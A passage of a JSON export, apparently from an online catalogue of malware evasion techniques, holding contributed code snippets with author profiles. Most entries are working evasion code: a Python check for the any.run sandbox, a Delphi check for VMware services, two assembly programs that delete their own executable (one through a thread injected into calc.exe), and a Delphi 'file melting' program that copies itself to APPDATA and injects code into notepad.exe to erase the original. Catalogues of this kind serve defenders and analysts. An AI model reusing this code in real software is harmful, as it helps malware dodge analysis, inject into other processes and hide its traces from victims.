            "plain_code": "#include <iostream>\r\n#include <windows.h>\r\n\r\nusing namespace std;\r\n\r\nint main()\r\n{\r\n\tSIZE_T s;\r\n\tprintf(\"Starting the LocalSize()\\n\");\r\n\tfor (int i = 0; i < 0xFFF; i++){\r\n\t    s = LocalSize(0);\r\n\t}\r\n\tprintf(\"Sempai! :) \\n\");\r\n\treturn 0;\r\n}"
        },
        {
            "id": 65,
            "language": {
                "id": 3,
                "label": "Python",
                "code_class": "python"
            },
            "user": {
                "id": 14,
                "username": "Kağan IŞILDAK",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/kaganisildak",
                "website": "https://kaganisildak.com",
                "github": "https://github.com/kaganisildak"
            },
            "technique": "https://unprotect.it/api/techniques/168/?format=api",
            "description": "This snippet detects if the process is running in the online sandbox app.any.run. It shells out to PowerShell and Sysinternals listdlls.exe and looks for three artifacts: the monitoring-agent DLLs winanr.dll / winsanr.dll loaded in srvpost.exe, a certificate under Cert:CurrentUser\\My whose text contains \"Some Company\", and a srvpost entry in the process list. listdlls.exe must be available on PATH (and its EULA accepted, hence /accepteula) or the Popen call fails before any check runs; the artifacts are environment-specific and may change as the sandbox is updated.",
            "plain_code": "import subprocess\r\n\r\ndef executer(args):\r\n    proc = subprocess.Popen(args,stdout=subprocess.PIPE)\r\n    return str(proc.communicate()[0])\r\n\r\ncert = executer([\"powershell.exe\", \"-Command\",\"Get-ChildItem\",\"-Recurse\",\"Cert:CurrentUser\\My\"])\r\nproc = executer([\"powershell.exe\",\"Get-Process\"])\r\ndlls = executer([\"listdlls.exe\",\"srvpost.exe\",\"/accepteula\"])\r\n\r\nSUSDLLS = (\"winanr.dll\", \"winsanr.dll\")\r\nif any(dll in dlls for dll in SUSDLLS): print(\"Any.Run Monitoring Agent Found\")\r\n\r\nif \"Some Company\" in cert or \"srvpost\" in proc:\r\n    print(\"ANY.RUN DETECTED\")\r\nelse:\r\n    print(\"NOT ANY.RUN\")"
        },
        {
            "id": 63,
            "language": {
                "id": 6,
                "label": "MASM",
                "code_class": "x86asm"
            },
            "user": {
                "id": 13,
                "username": "Jochen",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/Jochen16291934",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/167/?format=api",
            "description": "",
            "plain_code": "include 'win64ax.inc'\r\ninclude 'pe.inc'\r\nentry start\r\n\r\n\r\nstart:\r\n\r\n       sub rsp, 8 ; Align stack\r\n\r\n       fastcall [GetModuleFileNameA], 0, modulename, 50 ; Get full path of this file\r\n\r\n       mov rax,[gs:60h]    ; PEB\r\n       mov rax,[rax+10h]   ; ImageBaseAddress\r\n\r\n       mov [ImageBaseAddress], rax\r\n\r\n       movsxd  rax, dword [rax+IMAGE_DOS_HEADER.e_lfanew]\r\n       add rax,[ImageBaseAddress]\r\n\r\n       mov eax, dword [rax+IMAGE_NT_HEADERS64.OptionalHeader.SizeOfImage]\r\n       mov [dwSize], eax\r\n\r\n       ; To work for Win10 we must clear the sinfo struct (104 Bytes)\r\n\r\n       cinvoke memset, sinfo, 0, 104d\r\n       mov  [sinfo.cb], 104d\r\n\r\n       ; Now we create the process to inject our code in with CREATE_SUSPENDED flag so it does not actually run :)\r\n\r\n       fastcall [CreateProcessA], 0, sCalc, 0, 0, FALSE, CREATE_SUSPENDED, 0, 0, sinfo, pinfo\r\n\r\n\r\n       ; Allocate memory in the remote process (Calc.exe)\r\n\r\n       fastcall [VirtualAllocEx], [pinfo.hProcess], [ImageBaseAddress], [dwSize], MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE\r\n\r\n       ; Write it to the remote process\r\n\r\n       fastcall [WriteProcessMemory], [pinfo.hProcess], rax, [ImageBaseAddress], [dwSize], 0\r\n\r\n       ; execute the code pointed by HijackedThread into the remote process\r\n\r\n       fastcall [CreateRemoteThread], [pinfo.hProcess], 0, 0, HijackedThread, 0, 0, 0\r\n\r\nexit:  fastcall [ExitProcess], 0  ; exit this process so the injected code can delete this file !\r\n\r\n\r\n\r\n HijackedThread:\r\n\r\n       sub rsp, 8\r\n\r\n       invoke DeleteFileA, modulename  ; <-- modulename contains the full path of this file\r\n       invoke ExitProcess,0\r\n\r\n\r\n\r\nsection '.data' data readable writeable\r\n\r\n\r\nsCalc  db  'calc.exe',0  ; <-- process where we inject our code in\r\n\r\n\r\n modulename  rb 50\r\n\r\n\r\n\r\n pinfo\t      PROCESS_INFORMATION\r\n sinfo\t  
    STARTUPINFO\r\n\r\n ImageBaseAddress     dq 0\r\n dwSize \t      dd 0\r\n\r\n\r\nsection '.idata' import data readable writeable\r\n\r\n  library kernel32,'KERNEL32.DLL',\\\r\n\t  user32,'USER32.DLL',\\\r\n\t  msvcrt,'msvcrt.dll'\r\n\r\n\r\n import msvcrt,\\\r\n\tmemset,'memset'\r\n\r\n  include 'api\\kernel32.inc'\r\n  include 'api\\user32.inc'"
        },
        {
            "id": 64,
            "language": {
                "id": 6,
                "label": "MASM",
                "code_class": "x86asm"
            },
            "user": {
                "id": 13,
                "username": "Jochen",
                "email": "null@localhost",
                "linkedin": null,
                "twitter": "https://twitter.com/Jochen16291934",
                "website": null,
                "github": null
            },
            "technique": "https://unprotect.it/api/techniques/167/?format=api",
            "description": "",
            "plain_code": "include 'win32ax.inc'\r\n\r\nmain:\r\n\r\n\r\n\r\n     stdcall [GetModuleFileName],0,modulename,80\r\n     stdcall [CreateFile],BatFile,GENERIC_WRITE,0,0,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,0\r\n\r\n     mov [myfile], eax\r\n     cmp eax, 0xffffff\r\n     jz .exit\r\n\r\n     stdcall [wsprintf],buf,MainStr,modulename,modulename\r\n     stdcall [WriteFile],[myfile],buf,bufsize,byteswritten,0\r\n     stdcall [CloseHandle],[myfile]\r\n\r\n\r\n     stdcall [ShellExecute],0,0,BatFile,0,0,SW_HIDE\r\n\r\n.exit:\tstdcall [ExitProcess],0\r\n\r\n\r\n\r\n MainStr db \":Repeat\",13,10,\\\r\n\t   \"del %s\",13,10,\\\r\n\t   \"if exist %s goto Repeat\",13,10,\\\r\n\t   \"del del.bat\",0\r\n\r\n BatFile db \"del.bat\",0\r\n\r\n modulename rb 80\r\n buf\t    rb\t0xff\r\n bufsize = $ - buf\r\n\r\n myfile \t\t dd ?\r\n byteswritten\t     dd ?\r\n\r\ndata import\r\nlibrary kernel32,\"kernel32.dll\",user32,\"user32.dll\",shell32,\"shell32.dll\"\r\ninclude \"%include%/api/shell32.inc\"\r\ninclude \"%include%/api/kernel32.inc\"\r\ninclude \"%include%/api/user32.inc\"\r\nend data"
        },
        {
            "id": 62,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/167/?format=api",
            "description": "",
            "plain_code": "{\r\n  32Bit Example of File Melting\r\n}\r\n\r\nprogram Melt;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  System.SysUtils,\r\n  WinAPI.Windows,\r\n  shlobj;\r\n\r\n\r\ntype\r\n  TRemotePointer = record\r\n    Address : Pointer;\r\n    Size    : Cardinal;\r\n  end;\r\n\r\n  TMeltThreadInfo = record\r\n    // WinAPI\r\n    GetProcAddress : Pointer;\r\n    LoadLibrary    : Pointer;\r\n    GetLastError   : Pointer;\r\n    ExitProcess    : Pointer;\r\n    DeleteFileW    : Pointer;\r\n    Sleep          : Pointer;\r\n    WinExec        : Pointer;\r\n\r\n    // Str\r\n    sTargetFile    : Pointer;\r\n    sExecFile      : Pointer;\r\n  end;\r\n  PMeltThreadInfo = ^TMeltThreadInfo;\r\n\r\n{\r\n  Generate an exception message with Last Error Information\r\n}\r\nfunction GetLastErrorMessage(AFuncName : String) : String;\r\nbegin\r\n  result := Format('\"%s\" call failed with LastError=[%d], Message=[%s].', [\r\n    AFuncName,\r\n    GetLastError(),\r\n    SysErrorMessage(GetLastError())\r\n  ]);\r\nend;\r\n\r\n{\r\n  Spawn a new hidden process\r\n}\r\nfunction Spawn(APEFile : String) : THandle;\r\nvar hProc               : THandle;\r\n    b                   : Boolean;\r\n    AStartupInfo        : TStartupInfo;\r\n    AProcessInformation : TProcessInformation;\r\nbegin\r\n  result := INVALID_HANDLE_VALUE;\r\n  ///\r\n\r\n  ZeroMemory(@AProcessInformation, SizeOf(TProcessInformation));\r\n  ZeroMemory(@AStartupInfo, SizeOf(TStartupInfo));\r\n\r\n  AStartupInfo.cb          := SizeOf(TStartupInfo);\r\n  AStartupInfo.wShowWindow := SW_SHOW;\r\n  AStartupInfo.dwFlags     := STARTF_USESHOWWINDOW;\r\n\r\n  UniqueString(APEFile);\r\n\r\n  b := CreateProcessW(\r\n                          PWideChar(APEFile),\r\n                          nil,\r\n                          nil,\r\n                          nil,\r\n                          False,\r\n                          0,\r\n                          nil,\r\n                          
nil,\r\n                          AStartupInfo,\r\n                          AProcessInformation\r\n  );\r\n\r\n  if not b then\r\n    raise Exception.Create(GetLastErrorMessage('CreateProcessW'));\r\n\r\n  ///\r\n  result := AProcessInformation.hProcess;\r\nend;\r\n\r\n{\r\n  Melt File using Process Injection Technique\r\n}\r\n\r\nprocedure MeltThread(pInfo : PMeltThreadInfo) ; stdcall;\r\nvar _GetLastError   : function() : DWORD; stdcall;\r\n    _ExitProcess    : procedure(uExitCode : UINT); stdcall;\r\n    _DeleteFileW    : function(lpFileName : LPCSTR) : BOOL; stdcall;\r\n    _Sleep          : procedure(dwMilliseconds : DWORD); stdcall;\r\n    _MessageBox : function(hWindow : HWND; lpText : LPCWSTR; lpCaption : LPCWSTR; uType : UINT):integer;stdcall;\r\n    _WinExec        : function(lpCmdLine : LPCSTR; uCmdShow : UINT) : UINT; stdcall;\r\nbegin\r\n  @_GetLastError   := pInfo^.GetLastError;\r\n  @_ExitProcess    := pInfo^.ExitProcess;\r\n  @_DeleteFileW    := pInfo^.DeleteFileW;\r\n  @_Sleep          := pInfo^.Sleep;\r\n  @_WinExec        := pInfo^.WinExec;\r\n\r\n  while not _DeleteFileW(pInfo^.sTargetFile) do begin\r\n    if (_GetLastError = ERROR_FILE_NOT_FOUND) then\r\n      break;\r\n    ///\r\n\r\n    _Sleep(100);\r\n  end;\r\n\r\n  _WinExec(PAnsiChar(pInfo^.sExecFile), SW_SHOW);\r\n\r\n  _ExitProcess(0);\r\n\r\n  /// EGG\r\n  asm\r\n    mov eax, $DEADBEAF;\r\n    mov eax, $DEADBEAF;\r\n  end;\r\nend;\r\n\r\nprocedure DoMelt_Injection(ATargetFile, AExecFile : String);\r\nvar hProc         : THandle;\r\n    ABytesWritten : SIZE_T;\r\n    AInfo         : TMeltThreadInfo;\r\n    p             : Pointer;\r\n    AThreadID     : DWORD;\r\n    AThreadProc   : TRemotePointer;\r\n    AInjectedInfo : TRemotePointer;\r\n    hKernel32     : THandle;\r\n    pSysWow64     : PWideChar;\r\n\r\n  function FreeRemoteMemory(var ARemotePointer : TRemotePointer) : Boolean;\r\n  begin\r\n    result := False;\r\n    ///\r\n\r\n    if (NOT Assigned(ARemotePointer.Address)) or 
(ARemotePointer.Size = 0) then\r\n      Exit();\r\n\r\n    result := VirtualFreeEx(hProc, ARemotePointer.Address, ARemotePointer.Size, MEM_RELEASE);\r\n\r\n    ZeroMemory(@ARemotePointer, SizeOf(TRemotePointer));\r\n  end;\r\n\r\n  function InjectBuffer(pBuffer : PVOID; ABufferSize : Cardinal) : TRemotePointer;\r\n  begin\r\n    ZeroMemory(@result, SizeOf(TRemotePointer));\r\n    ///\r\n\r\n    result.Size := ABufferSize;\r\n    result.Address := VirtualAllocEx(hProc, nil, result.Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);\r\n    if result.Address = nil then\r\n      raise Exception.Create(GetLastErrorMessage('VirtualAllocEx'));\r\n    ///\r\n\r\n    if not WriteProcessMemory(hProc, result.Address, pBuffer, result.Size, ABytesWritten) then begin\r\n      FreeRemoteMemory(result);\r\n\r\n      raise Exception.Create(GetLastErrorMessage('WriteProcessMemory'));\r\n    end;\r\n  end;\r\n\r\n  function InjectStringW(AString : String) : TRemotePointer;\r\n  begin\r\n    result := InjectBuffer(PWideChar(AString), (Length(AString) * SizeOf(WideChar)));\r\n  end;\r\n\r\n  function InjectStringA(AString : AnsiString) : TRemotePointer;\r\n  begin\r\n    result := InjectBuffer(PAnsiChar(AString), (Length(AString) * SizeOf(AnsiChar)));\r\n  end;\r\n\r\n  function GetFuncSize(pFunc : Pointer) : Cardinal;\r\n  {\r\n    This is a very dumb but working technique, we scan for our special pattern to\r\n    get the address of our last MeltThread instruction.\r\n\r\n    We skip all epilogue instructions since the thread will end the parent process.\r\n\r\n    Other techniques exists to know the exact size of a function but is not required\r\n    for our example.\r\n  }\r\n  var I              : Integer;\r\n      pCurrentRegion : Pointer;\r\n      AFound         : Boolean;\r\n\r\n  const EGG : array[0..5-1] of Byte = ($B8, $AF, $BE, $AD, $DE);\r\n  begin\r\n    I := 0;\r\n    AFound := False;\r\n\r\n    while True do begin\r\n      pCurrentRegion := 
Pointer(NativeUInt(pFunc) + I);\r\n\r\n      if CompareMem(pCurrentRegion, @EGG, Length(EGG)) then begin\r\n        if AFound then begin\r\n          result := I - Length(EGG);\r\n\r\n          break;\r\n        end;\r\n\r\n        AFound := True;\r\n      end;\r\n\r\n      Inc(I);\r\n    end;\r\n  end;\r\n\r\nbegin\r\n  GetMem(pSysWOW64, MAX_PATH);\r\n  try\r\n    SHGetSpecialFolderPathW(0, pSysWOW64, CSIDL_SYSTEMX86, False);\r\n  finally\r\n    FreeMem(pSysWOW64, MAX_PATH);\r\n  end;\r\n\r\n  hProc := Spawn(Format('%s\\notepad.exe', [String(pSysWOW64)]));\r\n  try\r\n    ZeroMemory(@AInfo, SizeOf(TMeltThreadInfo));\r\n\r\n    {\r\n      Prepare Thread Parameter\r\n    }\r\n    hKernel32 := LoadLibrary('kernel32.dll');\r\n\r\n    AInfo.GetLastError   := GetProcAddress(hKernel32, 'GetLastError');\r\n    AInfo.ExitProcess    := GetProcAddress(hKernel32, 'ExitProcess');\r\n    AInfo.DeleteFileW    := GetProcAddress(hKernel32, 'DeleteFileW');\r\n    AInfo.Sleep          := GetProcAddress(hKernel32, 'Sleep');\r\n    AInfo.GetProcAddress := GetProcAddress(hKernel32, 'GetProcAddress');\r\n    AInfo.LoadLibrary    := GetProcAddress(hKernel32, 'LoadLibraryW');\r\n    AInfo.WinExec        := GetProcAddress(hKernel32, 'WinExec');\r\n\r\n    AInfo.sTargetFile    := InjectStringW(ATargetFile).Address;\r\n    AInfo.sExecFile      := InjectStringA(AnsiString(AExecFile)).Address;\r\n    try\r\n      AThreadProc := InjectBuffer(@MeltThread, GetFuncSize(@MeltThread));\r\n\r\n      AInjectedInfo := InjectBuffer(@AInfo, SizeOf(TMeltThreadInfo));\r\n\r\n      if CreateRemoteThread(hProc, nil, 0, AThreadProc.Address, AInjectedInfo.Address, 0, AThreadID) = 0 then\r\n        raise Exception.Create(GetLastErrorMessage('CreateRemoteThread'));\r\n\r\n      WriteLn('Done.');\r\n    except\r\n      on E: Exception do begin\r\n        TerminateProcess(hProc, 0);\r\n\r\n        raise;\r\n      end;\r\n    end;\r\n  finally\r\n    CloseHandle(hProc);\r\n  end;\r\nend;\r\n\r\n{\r\n  Program Entry 
Point\r\n}\r\nvar ACurrentFile : String;\r\n    ADestFile    : String;\r\nbegin\r\n  try\r\n    ACurrentFile := GetModuleName(0);\r\n\r\n    ADestFile := Format('%s\\%s', [\r\n        GetEnvironmentVariable('APPDATA'),\r\n        ExtractFileName(GetModuleName(0))\r\n    ]);\r\n\r\n    if String.Compare(ACurrentFile, ADestFile, True) = 0 then begin\r\n      {\r\n        After Melt (New Installed Copy)\r\n      }\r\n\r\n      WriteLn(Format('Melt successfully. I''m running from \"%s\"', [ACurrentFile]));\r\n      WriteLn('Press enter to exit.');\r\n      Readln;\r\n    end else begin\r\n      {\r\n        Melt Instance\r\n      }\r\n      WriteLn('Install our copy and initiate file melting...');\r\n\r\n      if NOT CopyFile(\r\n                        PWideChar(ACurrentFile),\r\n                        PWideChar(ADestFile),\r\n                        False) then\r\n        raise Exception.Create(Format('Could not copy file from \"%s\" to \"%s\"', [ACurrentFile, ADestFile]));\r\n\r\n      DoMelt_Injection(ACurrentFile, ADestFile);\r\n    end;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        },
        {
            "id": 61,
            "language": {
                "id": 1,
                "label": "Delphi",
                "code_class": "Delphi"
            },
            "user": {
                "id": 4,
                "username": "DarkCoderSc",
                "email": "jplesueur@proton.me",
                "linkedin": "https://www.linkedin.com/in/jlesueur/",
                "twitter": "https://www.twitter.com/darkcodersc",
                "website": "https://www.phrozen.io/",
                "github": "https://github.com/DarkCoderSc"
            },
            "technique": "https://unprotect.it/api/techniques/6/?format=api",
            "description": "Two methods of checking for the VMware service names in ANTI_LIST are demonstrated: the Service Control Manager API (OpenSCManagerW with SC_MANAGER_ENUMERATE_SERVICE, then OpenServiceW per name) and the registry (RegOpenKeyExW on HKLM\\SYSTEM\\CurrentControlSet\\Services\\<name>). Two caveats in the listing: CheckService_Registry does not initialise its result before the loop, so a run with no hits returns an undefined value, and the error path in CheckService_WinSvc passes the integer GetLastError() to a %s specifier, which Delphi's Format rejects (use %d).",
            "plain_code": "program AntiSandboxScanService;\r\n\r\n{$APPTYPE CONSOLE}\r\n\r\n{$R *.res}\r\n\r\nuses\r\n  System.SysUtils,\r\n  WinAPI.Windows,\r\n  WinAPI.WinSvc;\r\n\r\n\r\nconst ANTI_LIST : array[0..4-1] of String = (\r\n      // VMWare\r\n      'VGAuthService',\r\n      'vmvss',\r\n      'vm3dservice',\r\n      'VMTools' \r\n      // ...\r\n);\r\n\r\n{\r\n  Using Service Manager WinAPI + OpenService()\r\n\r\n  * https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-openscmanagerw\r\n  * https://docs.microsoft.com/en-us/windows/win32/api/winsvc/nf-winsvc-openservicew\r\n}\r\nfunction CheckService_WinSvc() : Boolean;\r\nvar AServiceManager : SC_HANDLE;\r\n    I               : Cardinal;\r\nbegin\r\n  result := False;\r\n  ///\r\n\r\n  AServiceManager := OpenSCManagerW(nil, nil, SC_MANAGER_ENUMERATE_SERVICE);\r\n  if AServiceManager = 0 then\r\n  raise Exception.Create(\r\n      Format('Could not open service manager with error=[%s]', [GetLastError()])\r\n  );\r\n  try\r\n    for I := 0 to Length(ANTI_LIST) -1 do begin\r\n      if (OpenServiceW(AServiceManager, PWideChar(ANTI_LIST[I]), READ_CONTROL) <> 0) then begin\r\n        WriteLn(Format('[*] \"%s\" service found.', [ANTI_LIST[I]]));\r\n\r\n        ///\r\n        result := true;\r\n      end;\r\n    end;\r\n  finally\r\n    CloseServiceHandle(AServiceManager);\r\n  end;\r\nend;\r\n\r\n{\r\n  Using Microsoft Windows Registry + RegOpenKeyExW\r\n\r\n  * https://docs.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regopenkeyexw\r\n}\r\nfunction CheckService_Registry() : Boolean;\r\nconst HIVE : HKEY = HKEY_LOCAL_MACHINE;\r\n      PATH = 'SYSTEM\\CurrentControlSet\\Services\\%s';\r\nvar AStatus : Longint;\r\n    AKey    : HKEY;\r\n    I       : Cardinal;\r\n    APath   : String;\r\nbegin\r\n  for I := 0 to Length(ANTI_LIST) -1 do begin\r\n    APath := Format(PATH, [ANTI_LIST[i]]);\r\n    if RegOpenKeyExW(HIVE, PWideChar(APath), 0, KEY_READ, AKey) <> ERROR_SUCCESS then\r\n      
continue;\r\n    try\r\n        WriteLn(Format('[*] \"%s\" service found.', [ANTI_LIST[I]]));\r\n\r\n        ///\r\n        result := true;\r\n    finally\r\n      RegCloseKey(AKey);\r\n    end;\r\n  end;\r\nend;\r\n\r\nprocedure Header(ACaption : String);\r\nbegin\r\n  WriteLn(StringOfChar('-', 50));\r\n  WriteLn(ACaption);\r\n  WriteLn(StringOfChar('-', 50));\r\nend;\r\n\r\nbegin\r\n  try\r\n    Header('Check Service (WinSvc):');\r\n    if not CheckService_WinSvc() then\r\n      WriteLn('Nothing found so far...');\r\n\r\n    WriteLn;\r\n\r\n    Header('Check Service (Registry):');\r\n    if not CheckService_Registry() then\r\n      WriteLn('Nothing found so far...');\r\n\r\n    readln;\r\n  except\r\n    on E: Exception do\r\n      Writeln(E.ClassName, ': ', E.Message);\r\n  end;\r\nend."
        }
    ]
}